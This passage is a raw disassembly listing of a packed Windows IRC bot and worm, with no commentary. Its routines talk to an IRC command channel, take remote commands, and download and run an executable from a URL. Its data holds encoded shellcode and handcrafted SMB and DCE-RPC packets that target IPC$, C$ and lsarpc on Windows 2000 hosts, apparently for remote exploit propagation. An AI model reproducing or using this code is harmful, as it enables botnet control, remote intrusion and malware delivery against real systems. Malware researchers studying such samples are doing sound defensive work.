pop edi
pop esi
leave
retn 4
sub_315030B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31503183 proc near ; CODE XREF: sub_315031EC+83�p
; UPX0:315035E9�p
var_14C = byte ptr -14Ch
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 14Ch
push esi
mov esi, ecx
call dword_31501124 ; rand
sub eax, 3
and eax, 7
push eax
lea eax, [ebp+var_20]
push eax
call sub_31501932
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14C]
push offset aQuitS ; "QUIT %s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 14h
lea eax, [ebp+var_14C]
push 0
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_14C]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push dword ptr [esi+5Ch]
call dword_315011A8 ; closesocket
xor eax, eax
pop esi
leave
retn
sub_31503183 endp
; =============== S U B R O U T I N E =======================================
sub_315031EC proc near ; CODE XREF: UPX0:315035D1�p
mov eax, offset loc_31503AC4
call sub_31503A98
sub esp, 110h
push ebx
push esi
push edi
mov edi, dword_315010C8
mov esi, ecx
mov [ebp-10h], esp
mov [ebp-14h], esi
call edi ; GetTickCount
mov [ebp-18h], eax
mov eax, [esi+5Ch]
mov dword ptr [ebp-11Ch], 1
mov [ebp-118h], eax
xor ebx, ebx
loc_31503227: ; CODE XREF: sub_315031EC+EF�j
call sub_31501A32
test eax, eax
jz short loc_31503274
push ebx
push ebx
lea eax, [ebp-11Ch]
push ebx
push eax
push 1
call dword_31501164 ; select
cmp eax, 0FFFFFFFFh
jz short loc_31503274
call sub_31501D82
test eax, eax
jz short loc_31503258
push 1
call dword_315010E0 ; ExitThread
loc_31503258: ; CODE XREF: sub_315031EC+62�j
mov [ebp-4], ebx
call edi ; GetTickCount
mov ecx, [ebp+8]
sub eax, [ebp-18h]
imul ecx, 0EA60h
cmp eax, ecx
jbe short loc_31503287
mov ecx, esi
call sub_31503183
loc_31503274: ; CODE XREF: sub_315031EC+42�j
; sub_315031EC+59�j ...
xor eax, eax
loc_31503276: ; CODE XREF: sub_315031EC+109�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31503287: ; CODE XREF: sub_315031EC+7F�j
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_315032F2
mov ecx, [esi+2Ch]
push 64h
mov [ecx+eax], bl
call dword_315010A4 ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503722
cmp eax, ebx
jnz short loc_31503274
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_31501A32
test eax, eax
jz short loc_31503274
push 64h
call dword_315010A4 ; Sleep
jmp loc_31503227
; ---------------------------------------------------------------------------
loc_315032E0: ; DATA XREF: UPX0:31503B3C�o
mov eax, [ebp-14h]
push dword ptr [eax+5Ch]
call dword_315011A8 ; closesocket
mov eax, offset loc_315032F2
retn
; ---------------------------------------------------------------------------
loc_315032F2: ; CODE XREF: sub_315031EC+B2�j
; DATA XREF: sub_315031EC+100�o
push 1
pop eax
jmp loc_31503276
sub_315031EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315032FA proc near ; CODE XREF: sub_31503722+9C�p
; sub_31503722+2B7�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 12Ch
push ebx
push esi
mov esi, dword_315010A0
push edi
push [ebp+arg_0]
mov edi, ecx
call esi ; lstrlenA
push [ebp+arg_4]
mov ebx, eax
call esi ; lstrlenA
add ebx, eax
cmp ebx, 10Eh
jle short loc_31503329
push 1
pop eax
jmp short loc_3150336A
; ---------------------------------------------------------------------------
loc_31503329: ; CODE XREF: sub_315032FA+28�j
push [ebp+arg_4]
lea eax, [ebp+var_12C]
push [ebp+arg_0]
push offset aPrivmsgSS ; "PRIVMSG %s %s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 10h
push 64h
call dword_315010A4 ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call esi ; lstrlenA
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [edi+5Ch]
call dword_3150119C ; send
xor eax, eax
loc_3150336A: ; CODE XREF: sub_315032FA+2D�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_315032FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31503371 proc near ; CODE XREF: UPX0:31503484�p
var_24 = qword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
call dword_31501050 ; GetSystemTime
movzx eax, [ebp+var_1A]
mov [ebp+var_4], eax
push ecx
fild [ebp+var_4]
push ecx
fstp [esp+24h+var_24]
call sub_31503AAA ; atan
movzx eax, [ebp+var_16]
fstp [ebp+var_C]
mov [ebp+var_4], eax
fild [ebp+var_4]
fstp [esp+24h+var_24]
call sub_31503AA4 ; sin
movzx eax, [ebp+var_1C]
fmul [ebp+var_C]
lea eax, [eax+eax*2]
fstp [ebp+var_C]
mov [ebp+var_4], eax
fild [ebp+var_4]
fstp [esp+24h+var_24]
call sub_31503A9E ; cos
fadd [ebp+var_C]
fstp [ebp+var_C]
push dword ptr [ebp+var_C]
call dword_31501128 ; srand
mov eax, [ebp+arg_0]
push 7
mov byte ptr [eax], 23h
inc eax
push eax
call sub_31501932
push 8
push [ebp+arg_4]
call sub_31501932
add esp, 1Ch
call dword_31501124 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
mov [eax], edx
call sub_315018BA
leave
retn
sub_31503371 endp
; ---------------------------------------------------------------------------
loc_31503408: ; DATA XREF: sub_31501D96+140�o
mov eax, offset loc_31503ADB
call sub_31503A98
sub esp, 2E8h
push ebx
push esi
xor ebx, ebx
push edi
mov ds:dword_315061A4, ebx
call sub_315018BA
mov esi, dword_31501124
call esi ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp-4Ch]
add edx, ecx
push edx
push eax
call sub_31501932
cmp ds:dword_315061A0, ebx
mov edi, dword_3150106C
pop ecx
pop ecx
jz short loc_3150345D
lea eax, [ebp-4Ch]
push offset a_ ; "_"
push eax
call edi ; lstrcatA
loc_3150345D: ; CODE XREF: UPX0:31503450�j
lea eax, [ebp-4Ch]
push offset a13 ; "13"
push eax
call edi ; lstrcatA
lea ecx, [ebp-2F4h]
call sub_31502DA1
mov [ebp-4], ebx
loc_31503476: ; CODE XREF: UPX0:315035DD�j
; UPX0:31503603�j
push offset dword_315061A8
lea eax, [ebp-18h]
push offset dword_315061AC
push eax
call sub_31503371
add esp, 0Ch
loc_3150348C: ; CODE XREF: UPX0:315034A0�j
call sub_31501A32
test eax, eax
jnz short loc_315034A2
push 3E8h
call dword_315010A4 ; Sleep
jmp short loc_3150348C
; ---------------------------------------------------------------------------
loc_315034A2: ; CODE XREF: UPX0:31503493�j
xor ebx, ebx
call esi ; rand
push 7
cdq
pop ecx
idiv ecx
lea eax, [ebp-6Ch]
add edx, 5
push edx
push eax
call sub_31501932
pop ecx
xor edi, edi
pop ecx
loc_315034BD: ; CODE XREF: UPX0:315034F9�j
push 1A0Bh
lea ecx, [ebp-2F4h]
push off_31505E14
call sub_31502DB6
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31502DEC
test eax, eax
jz short loc_31503550
inc edi
cmp edi, 8
jl short loc_315034BD
xor edi, edi
loc_315034FD: ; CODE XREF: UPX0:3150354C�j
call sub_31501A32
test eax, eax
jz short loc_3150355E
push 1A0Bh
call esi ; rand
push 13h
xor edx, edx
pop ecx
div ecx
lea ecx, [ebp-2F4h]
push off_31505E14[edx*4]
call sub_31502DB6
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31502DEC
test eax, eax
jz short loc_3150355B
inc edi
cmp edi, 4Ch
jb short loc_315034FD
jmp short loc_3150355E
; ---------------------------------------------------------------------------
loc_31503550: ; CODE XREF: UPX0:315034F3�j
push 1
pop ebx
mov ds:dword_315061A4, ebx
jmp short loc_31503567
; ---------------------------------------------------------------------------
loc_3150355B: ; CODE XREF: UPX0:31503546�j
push 1
pop ebx
loc_3150355E: ; CODE XREF: UPX0:31503504�j
; UPX0:3150354E�j
cmp ds:dword_315061A4, 0
jz short loc_31503576
loc_31503567: ; CODE XREF: UPX0:31503559�j
lea eax, [ebp-18h]
push offset aTaty ; "#taty"
push eax
call dword_31501088 ; lstrcpyA
loc_31503576: ; CODE XREF: UPX0:31503565�j
test ebx, ebx
jz short loc_315035EE
call sub_31501A32
test eax, eax
jz short loc_315035EE
loc_31503583: ; CODE XREF: UPX0:315035A8�j
lea eax, [ebp-18h]
lea ecx, [ebp-2F4h]
push eax
call sub_315030B1
test eax, eax
jz short loc_315035AA
push 3E8h
call dword_315010A4 ; Sleep
call sub_31501A32
test eax, eax
jnz short loc_31503583
loc_315035AA: ; CODE XREF: UPX0:31503594�j
cmp ds:dword_315061A4, 0
jz short loc_315035BA
mov edx, 0A8C0h
jmp short loc_315035CA
; ---------------------------------------------------------------------------
loc_315035BA: ; CODE XREF: UPX0:315035B1�j
call esi ; rand
cdq
mov ecx, 1F4h
idiv ecx
add edx, 578h
loc_315035CA: ; CODE XREF: UPX0:315035B8�j
push edx
lea ecx, [ebp-2F4h]
call sub_315031EC
call sub_31501A32
test eax, eax
jz loc_31503476
lea ecx, [ebp-2F4h]
call sub_31503183
loc_315035EE: ; CODE XREF: UPX0:31503578�j
; UPX0:31503581�j
call esi ; rand
push 0Ah
cdq
pop ecx
idiv ecx
imul edx, 0EA60h
push edx
call dword_315010A4 ; Sleep
jmp loc_31503476
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31503608 proc near ; CODE XREF: sub_31503722+5E�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31501154 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_31503633
push 1
jmp loc_315036C9
; ---------------------------------------------------------------------------
loc_31503633: ; CODE XREF: sub_31503608+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_31501068 ; GetSystemDirectoryA
mov edi, dword_3150106C
lea eax, [ebp+var_110]
push offset asc_31505CF0 ; "\\"
push eax
call edi ; lstrcatA
lea eax, [ebp+var_110]
push 6
push eax
call dword_315010A0 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_31501932
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset a_exe ; ".exe"
push eax
call edi ; lstrcatA
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_315010F0 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_315036A9
push 2
jmp short loc_315036C9
; ---------------------------------------------------------------------------
loc_315036A9: ; CODE XREF: sub_31503608+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31501150 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_315036CC
push [ebp+var_4]
call dword_315010BC ; CloseHandle
push 3
loc_315036C9: ; CODE XREF: sub_31503608+26�j
; sub_31503608+9F�j
pop eax
jmp short loc_3150371D
; ---------------------------------------------------------------------------
loc_315036CC: ; CODE XREF: sub_31503608+B4�j
mov edi, 100000h
push edi
call sub_31502800
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31501158 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_3150104C ; WriteFile
push [ebp+var_4]
call dword_315010BC ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31501962
push ebx
call sub_31502814
add esp, 0Ch
xor eax, eax
loc_3150371D: ; CODE XREF: sub_31503608+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_31503608 endp
; =============== S U B R O U T I N E =======================================
sub_31503722 proc near ; CODE XREF: sub_315031EC+D1�p
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_264 = byte ptr -264h
var_200 = byte ptr -200h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 4
sub esp, 2CCh
push ebx
push ebp
push esi
push edi
push offset dword_315061AC
mov esi, ecx
push [esp+2E0h+arg_0]
call dword_31501120 ; strstr
mov edi, dword_315010C8
pop ecx
mov ebx, eax
pop ecx
mov [esp+2DCh+var_2CC], ebx
call edi ; GetTickCount
sub eax, [esi+70h]
cmp eax, 927C0h
jbe short loc_31503761
and dword ptr [esi+284h], 0
loc_31503761: ; CODE XREF: sub_31503722+36�j
cmp dword ptr [esi+7Ch], 0
jz short loc_315037C3
call edi ; GetTickCount
mov ecx, [esi+78h]
sub eax, [esi+74h]
imul ecx, 3E8h
cmp eax, ecx
jbe short loc_315037C3
lea eax, [esi+180h]
push eax
call sub_31503608
test eax, eax
pop ecx
jnz short loc_315037C3
call edi ; GetTickCount
push dword ptr [esi+78h]
and dword ptr [esi+7Ch], 0
mov [esi+70h], eax
lea eax, [esp+2E0h+var_2C8]
push offset a1D ; "-1,%d"
push eax
mov dword ptr [esi+284h], 1
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [esp+2DCh+var_2C8]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_315032FA
loc_315037C3: ; CODE XREF: sub_31503722+43�j
; sub_31503722+55�j ...
test ebx, ebx
jz loc_31503A01
push ebx
call dword_315010A0 ; lstrlenA
cmp eax, 0Ah
jle loc_31503A01
mov ebp, dword_31501110
add ebx, 8
push 7Ch
push ebx
call ebp ; strchr
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz loc_31503A01
and byte ptr [edi], 0
push ebx
call dword_315010A0 ; lstrlenA
cmp eax, 100h
jge loc_31503A28
push ds:dword_315061A8
lea eax, [esp+2E0h+var_200]
push ebx
push eax
call sub_31502D3C
lea ebx, [edi+1]
push 7Ch
push ebx
mov byte ptr [edi], 7Ch
call ebp ; strchr
mov edi, eax
add esp, 14h
test edi, edi
jz loc_31503A01
and byte ptr [edi], 0
push ebx
call dword_315010A0 ; lstrlenA
cmp eax, 100h
jge loc_31503A28
push ds:dword_315061A8
lea eax, [esi+180h]
push ebx
push eax
call sub_31502D3C
add esp, 0Ch
lea eax, [esp+2DCh+var_200]
push offset aE ; "e"
push eax
call dword_31501040 ; lstrcmpA
mov ebx, dword_31501088
test eax, eax
jnz loc_31503968
lea eax, [esi+180h]
push eax
call dword_315010A0 ; lstrlenA
cmp eax, 0FFh
jge loc_31503968
cmp dword ptr [esi+284h], 0
jnz loc_31503968
cmp dword ptr [esi+7Ch], 0
jnz loc_31503968
lea eax, [edi+1]
push 7Ch
push eax
call ebp ; strchr
mov ebp, eax
pop ecx
test ebp, ebp
pop ecx
jz loc_31503949
and byte ptr [ebp+0], 0
lea eax, [edi+1]
push eax
call dword_315010A0 ; lstrlenA
cmp eax, 100h
jge loc_31503A28
lea eax, [edi+1]
push eax
lea eax, [esp+2E0h+var_100]
push eax
call ebx ; lstrcpyA
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
mov byte ptr [edi], 7Ch
push eax
call ebx ; lstrcpyA
mov byte ptr [ebp+0], 7Ch
and byte ptr [edi], 0
cmp [esp+2DCh+var_100], 65h
jle short loc_31503956
lea eax, [esp+2DCh+var_FF]
push eax
call dword_315010F8 ; atoi
mov ebp, eax
pop ecx
test ebp, ebp
jz short loc_31503956
cmp ebp, 0E10h
jnb short loc_31503956
call dword_31501124 ; rand
xor edx, edx
mov dword ptr [esi+7Ch], 1
div ebp
mov [esi+78h], edx
call dword_315010C8 ; GetTickCount
mov [esi+74h], eax
jmp short loc_31503956
; ---------------------------------------------------------------------------
loc_31503949: ; CODE XREF: sub_31503722+19D�j
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
push eax
call ebx ; lstrcpyA
loc_31503956: ; CODE XREF: sub_31503722+1E9�j
; sub_31503722+1FE�j ...
lea eax, [esi+80h]
push offset asc_31506124 ; "|"
push eax
call dword_3150106C ; lstrcatA
loc_31503968: ; CODE XREF: sub_31503722+15A�j
; sub_31503722+172�j ...
mov ebp, dword_31501040
lea eax, [esp+2DCh+var_200]
push offset aI ; "i"
push eax
call ebp ; lstrcmpA
test eax, eax
jnz short loc_315039DE
lea eax, [esp+2DCh+var_2C8]
push offset dword_315061CC
push eax
call ebx ; lstrcpyA
lea eax, [esp+2DCh+var_2C8]
push 63h
push eax
push 7
push 400h
call dword_31501040+4
push ds:dword_31506198
lea eax, [esp+2E0h+var_2C8]
push eax
lea eax, [esp+2E4h+var_264]
push ds:dword_31506194
push ds:dword_3150615C
push offset aDD13SD ; "%d,%d,13%s,%d"
push eax
call dword_3150113C ; wsprintfA
add esp, 18h
lea eax, [esp+2DCh+var_264]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_315032FA
loc_315039DE: ; CODE XREF: sub_31503722+25D�j
lea eax, [esp+2DCh+var_200]
push offset aQ ; "q"
push eax
call ebp ; lstrcmpA
test eax, eax
jnz short loc_315039FE
cmp [esi+284h], eax
jz short loc_315039FE
push 1
pop eax
jmp short loc_31503A2A
; ---------------------------------------------------------------------------
loc_315039FE: ; CODE XREF: sub_31503722+2CD�j
; sub_31503722+2D5�j
mov byte ptr [edi], 7Ch
loc_31503A01: ; CODE XREF: sub_31503722+A3�j
; sub_31503722+B3�j ...
cmp dword ptr [esi+284h], 0
jz short loc_31503A28
push offset aJoin ; "JOIN"
push [esp+2E0h+arg_0]
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31503A28
call dword_31501124 ; rand
loc_31503A28: ; CODE XREF: sub_31503722+E2�j
; sub_31503722+123�j ...
xor eax, eax
loc_31503A2A: ; CODE XREF: sub_31503722+2DA�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 2CCh
retn 4
sub_31503722 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A38 proc near ; CODE XREF: sub_315011C0+128�p
; sub_315011C0+134�p ...
jmp dword_31501134
sub_31503A38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A3E proc near ; CODE XREF: sub_315011C0+9C�p
; sub_315011C0+C5�p ...
jmp dword_31501130
sub_31503A3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A44 proc near ; CODE XREF: sub_315011C0+93�p
; sub_315011C0+B2�p ...
jmp dword_3150112C
sub_31503A44 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31503A50 proc near ; CODE XREF: sub_315011C0+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31503A70
loc_31503A5C: ; CODE XREF: sub_31503A50+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31503A5C
loc_31503A70: ; CODE XREF: sub_31503A50+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31503A50 endp
; ---------------------------------------------------------------------------
align 10h
loc_31503A80: ; DATA XREF: sub_31501D96+A�o
jmp dword ptr loc_3150111C
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A86 proc near ; CODE XREF: sub_31501F6B+10C�p
; sub_31501F6B+119�p ...
jmp dword_31501118
sub_31503A86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A8C proc near ; CODE XREF: sub_31501F6B+35�p
jmp dword_31501114
sub_31503A8C endp
; ---------------------------------------------------------------------------
loc_31503A92: ; CODE XREF: UPX0:31503AC9�j
; UPX0:31503AE0�j
jmp dword ptr locret_3150110A+2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A98 proc near ; CODE XREF: sub_315031EC+5�p
; UPX0:3150340D�p
jmp dword ptr loc_31501108
sub_31503A98 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A9E proc near ; CODE XREF: sub_31503371+4F�p
jmp dword_31501104
sub_31503A9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AA4 proc near ; CODE XREF: sub_31503371+34�p
jmp dword_31501100
sub_31503AA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AAA proc near ; CODE XREF: sub_31503371+1F�p
jmp dword_315010FC
sub_31503AAA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AB0 proc near ; CODE XREF: sub_31502490+AB�p
jmp dword_31501084
sub_31503AB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AB6 proc near ; CODE XREF: sub_31502490+64�p
jmp dword_3150107C
sub_31503AB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503ABC proc near ; CODE XREF: sub_31502490+2D�p
jmp dword_31501078
sub_31503ABC endp
; ---------------------------------------------------------------------------
align 4
loc_31503AC4: ; DATA XREF: sub_315031EC�o
mov eax, offset dword_31503AE8
jmp loc_31503A92
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-2F4h]
jmp loc_31502DD4
; ---------------------------------------------------------------------------
loc_31503ADB: ; DATA XREF: UPX0:loc_31503408�o
mov eax, offset dword_31503B40
jmp loc_31503A92
; ---------------------------------------------------------------------------
align 4
dword_31503AE8 dd 19930520h, 2, 31503B08h, 1, 31503B18h, 3 dup(0)
; DATA XREF: UPX0:loc_31503AC4�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 31503B30h, 4 dup(0)
dd offset loc_315032E0
dword_31503B40 dd 19930520h, 1, 31503B60h, 5 dup(0) dd 0FFFFFFFFh, 31503AD0h, 526h dup(0)
byte_31505000 db 0EBh ; DATA XREF: sub_315011C0+24E�o
; sub_315011C0+260�o ...
db 58h
word_31505002 dw 7468h ; DATA XREF: sub_31502277+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1F1B966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C571C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B471C999h
dd 99C99998h, 0E3F367C9h, 0D11C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A20414D9h, 99C99998h
dd 9371CAC9h, 99C99998h, 61688DC9h, 0AE1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992671h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993C71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998D12Ch, 0C9C999C9h, 0C9991371h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0D12C66CBh, 99C99998h, 0AE2C66C9h
dd 99C99998h, 990C71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998AEh, 1C71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A20414h, 0C999C999h, 99EA71CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999F171h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 0F0ABB7AAh, 2 dup(0C999C999h)
dd 0C5B7C999h, 0ECE9EDFFh, 0FCB7FDE9h, 0C999FCE1h, 6 dup(0C999C999h)
dd 0FCFCF5CAh, 0F2C999E9h, 0FCF7EBFCh, 99ABAAF5h, 0F934C7C9h
dd 25B459AAh, 0C9662A2Ah, 819093ACh, 909CC9B7h, 0C983639Dh
dd 999271CDh, 99C999C9h, 3519BFC9h, 0BDFD1451h, 91720A95h
dd 71F934C7h, 99C999C8h, 12C999C9h, 0D512A5D2h, 529AE180h
dd 8D146FAAh, 0B9C89A2Ah, 4A9A8B12h, 595859AAh, 0DB9BAB9Eh
dd 0C999A319h, 0DDA26CECh, 9EED85BDh, 81E8A2DFh, 125544EBh
dd 4A9ABDC8h, 0EB8D2E96h, 9A85D812h, 99D125Ah, 0DD105A9Ah
dd 10F885BDh, 9998D51Ch, 66C999C9h, 0FD7F6649h, 0A98712FEh
dd 0C212C999h, 85C21295h, 0C2128212h, 0FCB75A91h, 0B7FDF7h
dword_315052C8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_315011C0+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_31505354 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_31505400 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_315054E0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_315011C0+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_31505544 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_315055B0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_31505654 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
